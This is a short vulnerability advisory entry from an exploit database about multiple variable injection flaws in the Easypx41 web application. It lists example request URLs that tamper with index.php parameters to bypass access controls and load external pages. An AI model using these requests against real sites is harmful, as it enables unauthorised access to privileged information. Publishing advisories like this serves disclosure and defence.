Easypx41 Multiple Variable Injection Vulnerabilities

2014-07-01T00:00:00
ID SSV:79696
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/14421/info

Easypx41 is prone to multiple variable injection vulnerabilities.

An attacker can manipulate multiple script input variables and bypass access controls to retrieve sensitive and privileged information. Information obtained may aid in further attacks against the vulnerable application or the underlying system.

http://www.example.com/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20d?monstration.&msg=1103495330.dat&pgfull[variable-injection]
http://www.example.com/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull